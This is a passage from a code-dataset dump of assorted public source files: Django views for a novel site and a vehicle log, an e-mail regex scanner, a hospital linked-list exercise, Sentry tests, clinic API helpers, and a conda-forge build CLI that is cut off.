+{"seq_id":"349122942","text":"#!/usr/bin/env python3\nfrom lilaclib import *\n\nupdate_on = [{'aur':None}, {'vcs':'git+https://git.ffmpeg.org/ffmpeg.git'}]\nbuild_prefix = 'extra-x86_64'\npre_build = aur_pre_build\npost_build = aur_post_build\n\nif __name__ == '__main__':\n single_main(build_prefix)\n","sub_path":"archlinuxcn/ffmpeg-git/lilac.py","file_name":"lilac.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"347506663","text":"from django.db.models import Count\r\nfrom django.shortcuts import render\r\nfrom apps.books.models import Heat, Novel, Flash,Generalize\r\nfrom django.db.models import Q\r\nimport re\r\nfrom django.http import FileResponse\r\nimport json\r\nfrom apps.books.china_num import to_chinese4\r\nimport random\r\nimport os\r\n\r\n# Create your views here.\r\nkinds ={'xh':'玄幻奇幻',\"ds\":'都市言情','kh':'科幻灵异',\"dm\":'耽美同人','np':'女频言情','ls':'历史军事','wx':'武侠仙侠','wy':'网游竞技'}\r\n\r\ndef index(request):\r\n tops = {}\r\n left = {}\r\n unfind = \"\"\r\n all = Novel.objects.all()\r\n new_novel = {\"one\":all[0],\"two\":all[1]}\r\n if request.method == \"POST\":\r\n novel =all.filter(novel_name=request.POST.get('w'))\r\n if len(novel) == 0:\r\n unfind = \"没有你要找的小说\"\r\n else:\r\n return mulu(request, novel[0].id)\r\n for key ,kind_name in kinds.items():\r\n novels = all.filter(kind = kind_name).order_by(\"-heat__read_num\")\r\n if len(novels) > 2:\r\n left[key] = novels[0:2]\r\n else:\r\n left[key] = novels\r\n flash1 = Flash.objects.get(pk=2)\r\n flash2 = Flash.objects.get(pk=3)\r\n flash3 = Flash.objects.get(pk=4)\r\n man_novel = all.exclude(Q(kind=\"女频言情\") and Q(kind = \"耽美同人\"))\r\n if len(man_novel)>6:\r\n man_novel = man_novel[0:6]\r\n woman_novel = all.filter(Q(kind=\"女频言情\") | Q(kind = \"耽美同人\"))\r\n if len(woman_novel)>6:\r\n woman_novel = woman_novel[0:6]\r\n old = all\r\n click_order = old.order_by(\"-heat__read_num\")\r\n if len(click_order) > 6:\r\n click_order = list(click_order[0:6])\r\n down_order = old.order_by(\"-heat__down_load\")\r\n if len(down_order) > 6:\r\n down_order = list(down_order[0:6])\r\n nv = all.values(\"novel_name\")\r\n collect = nv.annotate(Count(\"bookshelf\")).order_by(\"-bookshelf__count\")[:6]\r\n all_generalize = Generalize.objects.all()\r\n for key ,value in kinds.items():\r\n top = all.filter(kind=value).order_by(\"-heat__read_num\")[0]\r\n tops[value] = top\r\n return render(request, \"index.html\",{\"unfind\":unfind,\r\n \"left\":left,\r\n \"flash1\":flash1,\"flash2\":flash2,\"flash3\":flash3,\r\n \"new_novel\":new_novel,\r\n \"man_novel\":man_novel,\r\n \"woman_novel\":woman_novel,\r\n \"click_order\":click_order,\r\n \"down_order\":down_order,\r\n \"collect\":collect,\r\n \"all_generalize\":all_generalize,\r\n \"tops\":tops,\r\n }\r\n )\r\n\r\n\r\ndef article(request,id):\r\n flash = Flash.objects.get(pk=id)\r\n flash_text = None\r\n with open(flash.text, 'r', encoding=\"utf-8\") as fp:\r\n flash_text = fp.readlines()\r\n return render(request,\"flash.html\",{\"flash\":flash,\"flash_text\":flash_text})\r\n\r\n\r\n\r\ndef kind(request,kind_name,num=0):\r\n chapter_list = []\r\n user = request.user\r\n kind_inf = None\r\n with open(\"static/setting.txt\",'r',encoding=\"utf-8\")as fp:\r\n kind_inf = json.loads(fp.read())\r\n if num < 0:\r\n num = 0\r\n novel_set = Novel.objects.filter(kind=kind_name)\r\n lenght = len(novel_set)\r\n n =lenght\r\n if num >= lenght:\r\n num = num-10\r\n pg_len = 1\r\n while True:\r\n n = n - 10\r\n if n > 0 :\r\n pg_len += 1\r\n else:\r\n break\r\n # print(lenght)\r\n if num+10 > lenght:\r\n novel_set = novel_set[num:(num+(lenght-num))]\r\n else:\r\n novel_set = novel_set[num:(num+10)]\r\n if num -10 < 0:\r\n last_num = num\r\n else:\r\n last_num = num - 10\r\n next_num = num + 10\r\n old = Novel.objects.filter(kind=kind_name)\r\n click_order = old.order_by(\"-heat__read_num\")\r\n if len(click_order) > 10:\r\n click_order = list(click_order[0:10])\r\n down_order = old.order_by(\"-heat__down_load\")\r\n if len(down_order) > 10:\r\n down_order = list(down_order[0:10])\r\n novel_all = Novel.objects.all()\r\n i = random.randint(0,len(novel_all)-10)\r\n other = novel_all[i:(i+10)]\r\n collect_id = request.GET.get('collect_id', '')\r\n print(collect_id)\r\n novels_numb = Novel.objects.all().count()\r\n # 判断用户是否已经登录\r\n info = {\r\n 'code': 200,\r\n 'msg': '收藏成功!',\r\n }\r\n if collect_id:\r\n # 判断用户是否已经登录\r\n if not user.is_authenticated:\r\n info = {\r\n 'code':300,\r\n 'msg':'没有登录就无法收藏小说哦',\r\n }\r\n else:\r\n # 判断用户是否已经收藏过小说\r\n novel = user.shelf.books.filter(id=collect_id)\r\n print(novel)\r\n if novel:\r\n info = {\r\n 'code':301,\r\n 'msg':'您已经收藏过本小说啦',\r\n }\r\n else:\r\n # 将书本实例保存到用户书架里\r\n new_novel = Novel.objects.get(id=collect_id)\r\n # many2many字段信息保存\r\n user.shelf.books.add(new_novel)\r\n user.shelf.save()\r\n # 用户没有阅读,直接收藏,默认从第一章开始读书\r\n if not user.shelf.chapters:\r\n collect_info = {}\r\n collect_info[new_novel.id] = 1\r\n user.shelf.chapters = json.dumps(collect_info)\r\n user.shelf.save()\r\n print(user.shelf.chapters)\r\n else:info={}\r\n\r\n return render(request,\"list.html\",{\"novel_set\":novel_set,\r\n \"pg_num\":int(num/10)+1,\r\n \"pg_len\":pg_len,'kind_name':kind_name,\r\n \"next\":next_num,\"last\":last_num,\r\n \"kind_text\":kind_inf[kind_name][0],\r\n \"kind_img\":kind_inf[kind_name][1],\r\n \"click_order\":click_order,\r\n \"down_order\":down_order,\r\n \"other\":other,\r\n \"info\":info,\r\n \"novels_numb\":novels_numb,\r\n }\r\n )\r\n\r\n\r\n\r\n\r\ndef mulu(request,id=1):\r\n li= []\r\n novel = Novel.objects.get(pk=id)\r\n name = novel.novel_name\r\n section = json.loads(novel.section_num)\r\n print(section)\r\n se_num = {}\r\n # download/万古天帝.txt\r\n # django工作目录为项目目录下第一层,与apps平级\r\n with open(novel.file, 'r', encoding=\"utf-8\") as fp:\r\n for key, value in section.items():\r\n se = to_chinese4(int(key))\r\n for line in fp:\r\n if re.search(f\"{value}.*[\\n]\", line) or re.search(f\"第{key}章.*[\\n]\", line) or re.search(f\"第{se}章.*[\\n]\", line) :\r\n se_num[key] = line\r\n break\r\n else:\r\n break\r\n li = []\r\n for key ,value in se_num.items():\r\n li.append((key,value))\r\n # print(li)\r\n return render(request,\"mulu.html\",{\"li\":li,\"novel_id\":id,\"se_num\":len(se_num),\"name\":name})\r\n\r\n\r\ndef look_novel(request,id=1,sec_num = 1):\r\n novel = Novel.objects.get(pk=id)\r\n print(novel.heat)\r\n if sec_num == 1:\r\n novel.heat.read_num = novel.heat.read_num + 1\r\n novel.save()\r\n data = []\r\n section = json.loads(novel.section_num)\r\n se_re = section[str(sec_num)]\r\n print(se_re)\r\n with open(novel.file,'r',encoding='utf-8') as fp:\r\n pos = fp.seek(0, 2)\r\n fp.seek(0)\r\n flag = 2\r\n while flag:\r\n text = fp.readline()\r\n if flag == 1 and re.search(r'第.*章', text) is None and fp.tell() != pos:\r\n data.append(text)\r\n elif flag == 2:\r\n pass\r\n else:\r\n flag -= 1\r\n if re.search(se_re, text) is not None and flag == 2:\r\n data.append(text)\r\n print(data)\r\n flag -= 1\r\n self_url = f\"/list/novel{id}/section/section:{sec_num}/\"\r\n user = request.user\r\n if user.is_authenticated: # 将登录用户的阅读信息暂存在当前session中\r\n if not user.shelf.chapters: # 用户第一次阅读记录,此时数据库中还没有数据\r\n js = {}\r\n js[novel.id] = sec_num\r\n user.shelf.chapters = json.dumps(js)\r\n user.shelf.save()\r\n else:\r\n js = json.loads(user.shelf.chapters) # 将每一条阅读记录去重之后保存到数据库\r\n # 最多保存二十条数据\r\n if len(js)>20:\r\n for i in range(1,20):\r\n js.popitem()\r\n js[str(novel.id)] = sec_num # 字典自动去重的特性,阅读同一本书时,只能储存一个键值对\r\n user.shelf.chapters = json.dumps(js)\r\n user.shelf.save()\r\n print(user.shelf.chapters)\r\n\r\n if section.get(str(sec_num+1)) is None:\r\n next_url = self_url\r\n else:\r\n next_url = f\"/list/novel{id}/section/section:{sec_num+1}/\"\r\n if section.get(str(sec_num-1)) is None:\r\n last_url = self_url\r\n else:\r\n last_url = f\"/list/novel{id}/section/section:{sec_num-1}/\"\r\n return render(request, \"novel.html\", {\"data\": data,\"pg_len\":len(section),\"pg_num\":sec_num,\"last\":last_url,\"next\":next_url,\"novel_id\":id})\r\n\r\ndef down_load(request,id=0):\r\n novel = Novel.objects.get(pk=id)\r\n novel.heat.down_load = novel.heat.down_load +1\r\n file=open(novel.file,'rb')\r\n response =FileResponse(file)\r\n response['Content-Type']='APPLICATION/OCTET-STREAM'\r\n response['Content-Disposition'] =f'attachment;filename={id}.txt'\r\n response['Content-Length'] = os.path.getsize(novel.file) # 传输给客户端的文件大小\r\n novel.save()\r\n return response\r\n\r\n# def add_hot(request):\r\n# i = 1\r\n# novels = Novel.objects.all()\r\n# for novel in novels:\r\n# print(i)\r\n# click_num = random.randint(500, 2000)\r\n# download_num = random.randint(1, 200)\r\n# new_heat = Heat(read_num=click_num,down_load=download_num)\r\n# new_heat.save()\r\n# novel.heat = new_heat\r\n# novel.save()\r\n# i=i+1\r\n# return HttpResponse(request,\"aaaa
\")\r\n","sub_path":"Novel/apps/books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"514623188","text":"import os.path\nimport re\n\npattern = \"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\\.[a-zA-Z0-9-.]+$)\"\n\n\nfor d in list(filter(lambda dd: os.path.splitext(dd)[1] == \".log\",os.listdir(\"C:\\\\Users\\\\tanga2\\\\PycharmProjects\\\\OOP\\\\Test\"))):\n fo = open(\"C:\\\\Users\\\\tanga2\\\\PycharmProjects\\\\OOP\\\\Test\" + \"\\\\\" + d, 'r')\n for line in fo:\n if re.search(pattern,line):\n print(line)\n\n","sub_path":"Day 4/EmailFinding.py","file_name":"EmailFinding.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"140243597","text":"# -*- coding: utf-8 -*-\n\nfrom django.db import models\nfrom club.models import SquadMember\nfrom fixtures.models import Fixture\n\n\nclass MatchReport(models.Model):\n fixture = models.ForeignKey(Fixture)\n author = models.ForeignKey(SquadMember)\n title = models.CharField(max_length=255, blank=True, null=True)\n report = models.TextField()\n created_date = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n if self.title:\n return str(self.title)\n else:\n return 'No Title'\n\n\nclass Fine(models.Model):\n fixture = models.ForeignKey(Fixture, null=True, related_name='fines')\n recipient = models.ForeignKey(SquadMember)\n amount = models.IntegerField(default=50)\n reason = models.TextField(null=True)\n created_date = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return \"%s (£%s)\" % (str(self.recipient), self.amount/100)\n\n\nclass Prematch(models.Model):\n fixture = models.ForeignKey(Fixture)\n author = models.ForeignKey(SquadMember)\n notes = models.TextField()\n created_date = models.DateTimeField(auto_now_add=True)\n theme = models.CharField(max_length=255, blank=True)\n beer = models.CharField(max_length=255, blank=True)\n\n def __str__(self):\n return str(self.fixture)\n","sub_path":"manager/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"378058830","text":"class No():\n def __init__(self, carga=None, nome=None, proximo=None):\n self.__carga = carga\n self.__nome = nome\n self.__proximo = proximo\n\n def getCarga(self):\n return self.__carga\n\n def getNome(self):\n return self.__nome\n\n def getProx(self):\n return self.__proximo\n\n def setProx(self, prox):\n self.__proximo = prox\n\n def __str__(self):\n return str(self.getCarga())\n def __repr__(self):\n return self.__str__()\n\n\nclass ListaEncadeada():\n def __init__(self):\n self.__inicio=None\n self.__final=None\n self.__tamanho=0\n self.__lista_auxiliar=[]\n\n def getInicio(self):\n if(self.__tamanho == 0):\n return 0\n else:\n return self.__inicio\n\n def getFinal(self):\n return self.__final\n \n def getTamanho(self):\n return self.__tamanho\n\n def insertion_sort(self):\n if(self.getTamanho() > 1):\n ref = self.__inicio\n current = ref\n while current.getProx() != None:\n if(current.getProx().getCarga() > current.getCarga()):\n current = current.getProx()\n elif(current.getProx().getCarga() == current.getCarga()):\n\n name1=str(ref.getNome())\n name2=str(temp.getNome())\n if(name1[0:2] > name2[0:2]):\n temp.setProx(ref)\n self.__inicio = temp\n ref = self.__inicio\n else:\n inpos = ref\n while temp.getCarga() > inpos.getProx().getCarga():\n inpos = inpos.getProx()\n temp.setProx(inpos.getProx())\n inpos.setProx(temp) \n else:\n temp = current.getProx()\n current.setProx(temp.getProx())\n if(ref.getCarga() > temp.getCarga()):\n temp.setProx(ref)\n self.__inicio = temp\n ref = self.__inicio\n else:\n inpos = ref\n while temp.getCarga() > inpos.getProx().getCarga():\n inpos = inpos.getProx()\n temp.setProx(inpos.getProx())\n inpos.setProx(temp) \n\n \n def inserir(self,carga,nome):\n temp = No(carga,nome)\n self.__tamanho+=1\n\n if(self.__inicio == None):\n self.__inicio = temp\n self.__final = temp\n else:\n self.__final.setProx(temp)\n temp.setProx(None)\n self.__final=temp\n\n self.__lista_auxiliar.append(temp)\n\n def printar(self):\n m=self.getInicio()\n for y in range(self.getTamanho()):\n print(m.getNome())\n m=m.getProx()\n\n\npremium=ListaEncadeada()\ndiamante=ListaEncadeada()\nouro=ListaEncadeada()\nprata=ListaEncadeada()\nbronze=ListaEncadeada()\nresto=ListaEncadeada()\n\nQtdPacientes=int(input())\nfor x in range(QtdPacientes):\n dados=input().split()\n if(dados[1] == \"premium\"):\n premium.inserir(int(dados[2]),dados[0])\n elif(dados[1] == \"diamante\"):\n diamante.inserir(int(dados[2]),dados[0])\n elif(dados[1] == \"ouro\"):\n ouro.inserir(int(dados[2]),dados[0])\n elif(dados[1] == \"prata\"):\n prata.inserir(int(dados[2]),dados[0])\n elif(dados[1] == \"bronze\"):\n bronze.inserir(int(dados[2]),dados[0])\n else:\n resto.inserir(int(dados[2]),dados[0])\n\npremium.insertion_sort()\ndiamante.insertion_sort()\nouro.insertion_sort()\nprata.insertion_sort()\nbronze.insertion_sort()\nresto.insertion_sort()\n\npremium.printar()\ndiamante.printar()\nouro.printar()\nprata.printar()\nbronze.printar()\nresto.printar()\n","sub_path":"UFRPE/Fundamentos de Problemas Computacionais SI2/Hospital/hospital.py","file_name":"hospital.py","file_ext":"py","file_size_in_byte":3873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"440966443","text":"from django.shortcuts import render,get_object_or_404,redirect\nfrom django.http import request\nfrom .models import regvehicle,entries,vehicle,wanttobe\nimport smtplib\nfrom django.core.mail import send_mail\n# Create your views here.\ndef homeview(request):\n vehicles=regvehicle.objects.all()\n entry=entries.objects.all()\n return render(request,'vehiclelog/homeview.html',{'vehicles':vehicles,'entries':entry})\n\ndef searchveh(request):\n if request.method==\"POST\":\n vehiclen=request.POST['vehicleno']\n regveh=vehicle.objects.filter(vehicle_no=vehiclen).first()\n if regveh:\n entry=entries() \n entry.vehicleno=regveh\n entry.save()\n if 'checkbox' in request.POST:\n if regveh.exit_or_enter==1:\n error=\"Person is already inside\"\n return render(request,'vehiclelog/error.html',{'error':error})\n regveh.exit_or_enter=1;\n regveh.save()\n lastentries=entries.objects.filter(vehicleno=regveh).all()\n sucess_msg=\"The entry is added\"\n return render(request,'vehiclelog/search.html',{'sucess':sucess_msg,'entries':lastentries})\n else:\n return render(request,'vehiclelog/save.html') \n return render(request,'vehiclelog/search.html',)\n\n\ndef saveentry(request):\n if request.method==\"POST\":\n vehiclen=request.POST['vehno']\n Vehicle=vehicle()\n Vehicle.owner =request.POST['name']\n Vehicle.contact=request.POST['email']\n Vehicle.vehicle_no=request.POST['vehno']\n Vehicle.reg_checker=1;\n Vehicle.exit_or_enter=1;\n Vehicle.save() \n unreg=wanttobe()\n unreg.veh_no=Vehicle\n unreg.purpose=request.POST['purpose']\n unreg.save()\n if wanttobe.objects.all().count() > 10 :\n send_mail(\n 'To cheif Security sir',\n 'Please check the mail list because there are many people are waiting for it' ,\n 'as931818@student.nitw.ac.in',\n ['singh12.7@gmail.com'],\n )\n entry=entries()\n entry.vehicleno=Vehicle\n entry.save()\n # send_mail(\n # 'Kya ho gya',\n # 'Main tumhe bhej rha hu',\n # 'chsaiteja@student.nitw.ac.in',\n # ['singh12.7@gmail.com'],\n # )\n return redirect('homeview')\n return render(request,'vehiclelog/save.html') \n\n\n\n","sub_path":"vehicletrack/vehiclelog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"97711216","text":"from django.urls import path, include\nfrom gatewayb.views import api_manager\nfrom manager import views\n\n\nurlpatterns = [\n path('accounts/', views.AccountList.as_view(), name='account-list'),\n path('accounts//', views.AccountDetail.as_view(), name='account-detail'),\n path('orders/', views.OrderList.as_view(), name='order-list'),\n path('orders//', views.OrderDetail.as_view(), name='order-list'),\n path('websocket/index/', views.index, name='websocket-index'),\n path('', api_manager, name='api_manager'),\n]\n","sub_path":"manager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"196360983","text":"from __future__ import absolute_import\n\nfrom django.core import mail\n\nfrom sentry.models import Activity, Release\nfrom sentry.testutils import TestCase\n\n\nclass SendNotificationTest(TestCase):\n def test_note(self):\n user_foo = self.create_user('foo@example.com')\n\n activity = Activity.objects.create(\n project=self.project,\n group=self.group,\n type=Activity.NOTE,\n user=user_foo,\n event=self.create_event('a' * 32, group=self.group),\n data={\n 'text': 'sup guise',\n },\n )\n\n self.project.team.organization.member_set.create(user=user_foo)\n\n with self.tasks():\n activity.send_notification()\n\n assert len(mail.outbox) == 1\n\n msg = mail.outbox[0]\n\n assert msg.subject == 'Re: [Sentry] [foo Bar] ERROR: Foo bar'\n assert msg.to == [self.user.email]\n\n def test_release(self):\n user_foo = self.create_user('foo@example.com')\n\n release = Release.objects.create(\n project=self.project,\n version='a' * 40,\n )\n\n activity = Activity.objects.create(\n project=self.project,\n type=Activity.RELEASE,\n user=user_foo,\n event=self.create_event('a' * 32, group=self.group),\n data={\n 'version': release.version,\n },\n )\n\n self.project.team.organization.member_set.create(user=user_foo)\n\n with self.tasks():\n activity.send_notification()\n\n assert len(mail.outbox) == 1\n\n msg = mail.outbox[0]\n\n assert msg.subject == '[Sentry] Release %s' % (release.version,)\n assert msg.to == [self.user.email]\n","sub_path":"tests/sentry/models/activity/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"286385341","text":"\nimport json\nimport logging.config\n\nfrom email_api import app, SETTINGS_FILE\n\ndef main():\n with open(SETTINGS_FILE, 'r') as fhandler:\n data = json.load(fhandler)\n logging.config.dictConfig(data['logging_dict'])\n app.run(data['host'], data['port'])\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"email/runserver.py","file_name":"runserver.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"518319199","text":"import requests\nimport json\nfrom Common import common\nfrom DB import DB\n\nheaders = common.headers\n\n\ndef create_desk(code):\n url = \"https://test.igancao.cn:8000/gateway/base/desk/create\"\n data = {\n \"code\": code,\n \"title\": \"科室\" + str(code)\n }\n r = requests.post(url, headers=headers, data=json.dumps(data), verify=False)\n return r.json()\n\n\ndef update_desk(code, id):\n url = \"https://test.igancao.cn:8000/gateway/base/desk/update\"\n data = {\n \"code\": code,\n \"title\": \"科室\" + str(code),\n \"id\": id\n }\n r = requests.post(url, headers=headers, data=json.dumps(data), verify=False)\n return r.json()\n\n\ndef disable_desk(id, enable):\n url = \"https://test.igancao.cn:8000/gateway/base/desk/disable\"\n data = {\n \"id\": id,\n \"enable\": enable\n }\n r = requests.post(url, headers=headers, data=json.dumps(data), verify=False)\n return r.json()\n\n\ndef create_room(code, deskid):\n url = \"https://test.igancao.cn:8000/gateway/base/room/create\"\n data = {\n \"code\": code,\n \"title\": \"诊室\" + str(code),\n \"remark\": \"sd\",\n \"deskId\": deskid\n }\n r = requests.post(url, headers=headers, data=json.dumps(data), verify=False)\n return r.json()\n\n\ndef update_room(code, roomid):\n url = \"https://test.igancao.cn:8000/gateway/base/room/update\"\n data = {\n \"code\": code,\n \"title\": \"修改诊室\" + str(code),\n \"id\": roomid,\n \"remark\": \"\\\"修改诊室\\\"\"}\n r = requests.post(url, headers=headers, data=json.dumps(data), verify=False)\n return r.json()\n\n\ndef disable_room(roomid, enable):\n url = \"https://test.igancao.cn:8000/gateway/base/room/disable\"\n data = {\n \"id\": roomid,\n \"enable\": enable\n }\n r = requests.post(url, headers=headers, data=json.dumps(data), verify=False)\n return r.json()\n\n\ndef query_deskid(code):\n query_deskid_sql = \"select id from gd_default.base_desk where code = '%s'\" % code\n result, results = DB.exe_sql(query_deskid_sql)\n return result, results\n\n\ndef query_roomid(code):\n query_roomid_sql = \"select id from gd_default.base_room where code = '%s'\" % code\n result, results = DB.exe_sql(query_roomid_sql)\n return result, results\n\n","sub_path":"GancaoSaas-Interface/ZhensuoManage/deskdata.py","file_name":"deskdata.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"120408265","text":"\"\"\"Scourge of the open sources\n\"\"\"\n\nimport concurrent.futures\nimport contextlib\nimport functools\nimport glob\nimport heapq\nimport itertools\nimport operator\nimport os\nimport pickle\nimport shutil\nimport tempfile\nimport threading\nimport time\n\nfrom multiprocessing import cpu_count\n\nimport click\nimport decorating\nimport networkx as nx\nimport sh\nimport toolz\nimport tqdm\nimport yaml\n\nfrom github import Github\n\nimport conda.api\n\nfrom diskcache import Cache\n\nfrom conda_build.metadata import MetaData\n\nfrom conda.resolve import MatchSpec\n\nfrom conda_build_all.version_matrix import special_case_version_matrix\n\n\nmemoize = functools.partial(\n toolz.memoize,\n cache=Cache(os.path.join(tempfile.gettempdir(), 'scourge'))\n)\n\n\nGH = Github(\n os.environ.get('GITHUB_USER', None),\n os.environ.get('GITHUB_ACCESS_TOKEN', None)\n)\n\n\n@contextlib.contextmanager\ndef pool(sequence, klass, max_workers=None):\n if max_workers is None:\n # Use at most half the number of CPUs available\n max_workers = max(1, min(cpu_count() // 2, len(sequence)))\n with klass(max_workers=max_workers) as e:\n yield e\n\n\n@contextlib.contextmanager\ndef thread_pool(sequence, max_workers=None):\n with pool(\n sequence,\n concurrent.futures.ThreadPoolExecutor,\n max_workers=max_workers,\n ) as e:\n yield e\n\n\n@contextlib.contextmanager\ndef process_pool(sequence, max_workers=None):\n with pool(\n sequence,\n concurrent.futures.ProcessPoolExecutor,\n max_workers=max_workers,\n ) as e:\n yield e\n\n\n@click.group(context_settings=dict(help_option_names=['-h', '--help']))\ndef cli():\n pass\n\n\ndef parse_git_version_spec(ctx, param, packages):\n package_specifications = {}\n for package in packages:\n package, *version = package.split('@', 1)\n package_specifications[package] = version[0] if version else None\n return package_specifications\n\n\ndef modify_metadata(meta, version, deps_to_build):\n if version is None:\n return meta\n\n *_, owner, name = meta.get_value('about/home').rsplit('/', 2)\n repo = GH.get_repo('{}/{}'.format(owner, name))\n raw_tag = get_latestrel(repo, sha=False)\n commit_count = get_count(repo, raw_tag, get_sha(repo, 'master'))\n simple_tag = raw_tag.rsplit('-', 1)[-1].replace('v', '')\n meta.meta['package']['version'] = '{}+{}.nightly'.format(\n simple_tag, commit_count\n )\n meta.meta['source'] = {\n 'git_url': meta.get_value('about/home'),\n 'git_rev': version,\n }\n requirements = meta.meta['requirements']\n build = requirements['build']\n run = requirements['run']\n\n if deps_to_build:\n for i, dep in enumerate(build):\n name, *_ = dep.split()\n if name in deps_to_build:\n meta.meta['requirements']['build'][i] = name\n\n for i, dep in enumerate(run):\n name, *_ = dep.split()\n if name in deps_to_build:\n meta.meta['requirements']['run'][i] = name\n\n return meta\n\n\ndef construct_dependency_subgraph(metadata):\n graph = {package: set() for package in metadata.keys()}\n\n for package, meta in metadata.items():\n requirements = frozenset(\n meta.get_value('requirements/build') +\n meta.get_value('requirements/run')\n )\n for dep in requirements:\n dep_name, *_ = dep.split()\n if dep_name in graph and dep_name != package:\n graph[package].add(dep_name)\n return graph\n\n\ndef get_sha(repo, ref):\n return repo.get_git_ref('heads/{}'.format(ref)).object.sha\n\n\n@cli.command(help='Get the sha of a GitHub repo ref without using git locally')\n@click.argument('repo', callback=lambda ctx, param, value: GH.get_repo(value))\n@click.argument('ref')\ndef sha(repo, ref):\n click.echo(get_sha(repo, ref))\n\n\n@memoize(key=lambda args, kwargs: (args[0].full_name, args[1], args[2]))\ndef get_count(repo, tag, sha):\n return repo.compare(tag, sha).total_commits\n\n\n@cli.command(help='Number of commits between tag and ref')\n@click.argument('repo', callback=lambda ctx, param, value: GH.get_repo(value))\n@click.argument('tag')\n@click.argument('ref', required=False, default='master')\ndef count(repo, tag, ref):\n click.echo(get_count(repo, tag, get_sha(repo, ref)))\n\n\n@memoize(key=lambda args, kwargs: (args[0].full_name, args[1][1]))\ndef tag_sort_key(repo, pair):\n _, sha = pair\n return repo.get_commit(sha).commit.committer.date\n\n\ndef get_latestrel(repo, sha):\n key = functools.partial(tag_sort_key, repo)\n tags = [(rel.name, rel.commit.sha) for rel in repo.get_tags()]\n (name, commit), = heapq.nlargest(1, tags, key=key)\n return commit if sha else name\n\n\n@cli.command(help='Latest release')\n@click.argument('repo', callback=lambda ctx, param, value: GH.get_repo(value))\n@click.option('-s/-n', '--sha/--name')\ndef latestrel(repo, sha):\n click.echo(get_latestrel(repo, sha))\n\n\ndef parse_package_branch(ctx, param, values):\n branches = {}\n\n for value in values:\n try:\n package, branch = value.split(':')\n except Exception as e:\n raise click.ClickException(str(e))\n branches[package] = branch\n\n return branches\n\n\ndef clone_and_checkout(url, branch=None, timeout=10): # 10 second timeout\n path = url.rsplit('/')[-1]\n sh.git.clone(url, path)\n\n sleep_interval = 0.05\n duration = 0\n\n while not os.path.exists(path) and duration <= timeout:\n time.sleep(sleep_interval)\n duration += sleep_interval\n\n if not os.path.exists(path):\n raise click.ClickException('Unable to clone {}'.format(url))\n\n if branch is not None:\n with sh.pushd(path):\n sh.git.checkout(branch)\n\n\n@cli.command(help='Pull in the conda forge docker image and clone feedstocks.')\n@click.argument(\n 'package_specifications', callback=parse_git_version_spec, nargs=-1)\n@click.option(\n '-i',\n '--image', required=False, default='condaforge/linux-anvil',\n help='The Docker image to use to build packages.'\n)\n@click.option(\n '-a', '--artifact-directory',\n default=os.path.join('.', 'artifacts'),\n type=click.Path(),\n help='The location to place tarballs upon a successful build.',\n)\n@click.option(\n '-r',\n '--recipe-branch',\n required=False,\n default={},\n callback=parse_package_branch,\n multiple=True,\n help='The conda-forge recipe branch to use for building a package.'\n)\n@click.option(\n '-t', '--recipe-clone-timeout',\n type=int,\n default=10,\n help='Wait this long before failing when cloning recipes',\n)\ndef init(package_specifications,\n image,\n artifact_directory,\n recipe_branch,\n recipe_clone_timeout):\n try:\n sh.docker.pull(image, _out=click.get_binary_stream('stdout'))\n except sh.ErrorReturnCode as e:\n try:\n result = sh.docker.images(image, quiet=True).splitlines()\n except sh.ErrorReturnCode as e2:\n click.get_binary_stream('stderr').write(e2.stderr)\n raise SystemExit(e2.exit_code)\n else:\n if not result:\n click.get_binary_stream('stderr').write(e.stderr)\n raise SystemExit(e.exit_code)\n\n feedstocks = [\n 'https://github.com/conda-forge/{}'.format(feedstock)\n for feedstock in map('{}-feedstock'.format, package_specifications)\n if not os.path.exists(feedstock)\n ]\n\n if feedstocks:\n progress = functools.partial(\n tqdm.tqdm,\n total=len(feedstocks),\n desc='Cloning feedstocks'\n )\n else:\n progress = iter\n\n with thread_pool(package_specifications) as executor:\n futures = [\n executor.submit(\n clone_and_checkout,\n feedstock,\n recipe_branch.get(spec, None),\n timeout=recipe_clone_timeout,\n ) for feedstock, spec in zip(feedstocks, package_specifications)\n ]\n\n for future in progress(concurrent.futures.as_completed(futures)):\n try:\n future.result()\n except sh.ErrorReturnCode as e:\n click.get_binary_stream('stderr').write(e.stderr)\n raise SystemExit(e.exit_code)\n\n packages = tuple(package_specifications.keys())\n\n recipes_directory = os.path.join('.', 'recipes')\n shutil.rmtree(recipes_directory, ignore_errors=True)\n\n os.makedirs(recipes_directory, exist_ok=True)\n os.makedirs(artifact_directory, exist_ok=True)\n\n recipe_paths = []\n\n for package in packages:\n package_recipe_directory = os.path.join(recipes_directory, package)\n recipe_path = os.path.join('{}-feedstock'.format(package), 'recipe')\n shutil.copytree(recipe_path, package_recipe_directory)\n recipe_paths.append(recipe_path)\n\n with process_pool(packages) as executor:\n package_metadata = dict(\n zip(packages, executor.map(MetaData, recipe_paths))\n )\n\n graph = construct_dependency_subgraph(package_metadata)\n\n metadata = {\n package: modify_metadata(meta, version, 